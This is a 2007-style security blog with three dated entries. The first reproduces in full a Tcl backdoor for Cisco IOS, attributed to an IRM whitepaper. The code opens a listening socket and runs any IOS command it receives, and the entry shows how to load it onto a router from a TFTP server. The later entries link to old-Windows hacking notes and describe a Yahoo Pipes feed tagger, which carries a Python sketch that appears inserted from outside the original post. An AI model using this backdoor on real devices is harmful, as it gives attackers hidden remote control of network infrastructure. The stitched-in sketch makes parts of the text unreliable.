It's the Code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA....what now? Ruby?
No Wait.. It should be just RUBY!

20071128

Shell code for IOS using TCLSH on Cisco devices..

A nice article published by IRM describes a simple way to create a Tcl backdoor for Cisco IOS. You can read the white paper here.
Oops: didn't know what I was sourcing..

Router>en
Router#tclsh
Router(tcl)#source tftp://tftpserver/tclsh.tcl

Source:

# TclShell.tcl v0.1 by Andy Davis, IRM 2007
#
# IRM accepts no responsibility for the misuse of this code
# It is provided for demonstration purposes only
proc callback {sock addr port} {
    fconfigure $sock -translation lf -buffering line
    puts $sock " "
    puts $sock "-------------------------------------"
    puts $sock "TclShell v0.1 by Andy Davis, IRM 2007"
    puts $sock "-------------------------------------"
    puts $sock " "
    set response [exec "sh ver | inc IOS"]
    puts $sock $response
    set response [exec "sh priv"]
    puts $sock $response
    puts $sock " "
    puts $sock "Enter IOS command:"
    fileevent $sock readable [list echo $sock]
}
proc echo {sock} {
    global var
    if {[eof $sock] || [catch {gets $sock line}]} {
    } else {
        set response [exec "$line"]
        puts $sock $response
    }
}
set port 1234
set sh [socket -server callback $port]
vwait var
close $sh

All material is IRM's, this is just a snippet from the article.

20071119

Low hangin fruit

Hacking old skool windows..

Notes from a CEH. Nothing new, but at least the basics are covered. This all should be automated by some wrapper so you don't waste time.. Generally you could do all this in Backtrack or similar builds.

http://hackathology.blogspot.com/2007/06/hacking-old-skoolz-windows.html

20071116

RSS / ATOM - Security Tagging Framework for Yahoo PIPES



I've been using Yahoo Pipes for a while to help filter some of the junk on Full Disclosure. Tagging became part of my daily habits, so I thought it most appropriate to create auto-taggers so I can read / filter much more quickly.

Security Tagging FrameWork

The core of the pipe is an array of regular expressions that strip off unnecessary titles, duplicates, and responses, and add pre-titles such as {Vulnerability}{Web-based}.

I've also created an example of how to use the framework with existing Yahoo Pipes.

Vulnerability Watch++ (Security Tagging Framework Example)

This pipe aggregates two feeds, de-duplicates them, and tags them by running them through the framework twice.
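
The same strip, de-duplicate and tag flow as a standalone sketch. This is an added example, not the pipe's own configuration: the regular expressions, the list names in the prefix rule and the sample feed titles are all constructed assumptions, since the pipe's actual rules are not shown here.

```python
import re

# Assumed rules: the pipe's real expressions are not listed on this page.
LIST_PREFIX = re.compile(r"^\s*\[(full-disclosure|bugtraq)\]\s*", re.I)
REPLY = re.compile(r"^\s*(re|fwd?)\s*:", re.I)

# (pre-title, pattern) pairs; every matching pre-title is prepended in order.
TAGS = [
    ("{Vulnerability}", re.compile(r"\b(overflow|injection|xss|bypass|traversal)\b", re.I)),
    ("{Web-based}", re.compile(r"\b(sql injection|xss|csrf|php)\b", re.I)),
]

def tag_feed(*feeds):
    """Merge feeds, drop list prefixes, responses and duplicates, add pre-titles."""
    seen, out = set(), []
    for title in (t for feed in feeds for t in feed):
        # Strip the mailing-list prefix and collapse whitespace.
        title = " ".join(LIST_PREFIX.sub("", title).split())
        if not title or REPLY.match(title):
            continue  # responses carry no new item, so they are dropped
        key = title.casefold()  # case-insensitive duplicate detection
        if key in seen:
            continue
        seen.add(key)
        prefix = "".join(tag for tag, rx in TAGS if rx.search(title))
        out.append(f"{prefix} {title}" if prefix else title)
    return out

# Constructed sample titles standing in for two aggregated feeds.
FEED_A = [
    "[Full-disclosure] SQL injection in ExampleCMS login form",
    "Re: [Full-disclosure] SQL injection in ExampleCMS login form",
    "[Full-disclosure] Stack overflow in exampled 1.0",
]
FEED_B = [
    "SQL Injection in ExampleCMS login form",
    "Monthly list charter reminder",
]

if __name__ == "__main__":
    for line in tag_feed(FEED_A, FEED_B):
        print(line)
```
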

Side note:

GNUCitizen posted two nice articles on Pipes and how flexibly they can be used with a JSON database.

1. 5-generic-yahoo-pipes-hackers-cannot-live-without

2. Project Renaissance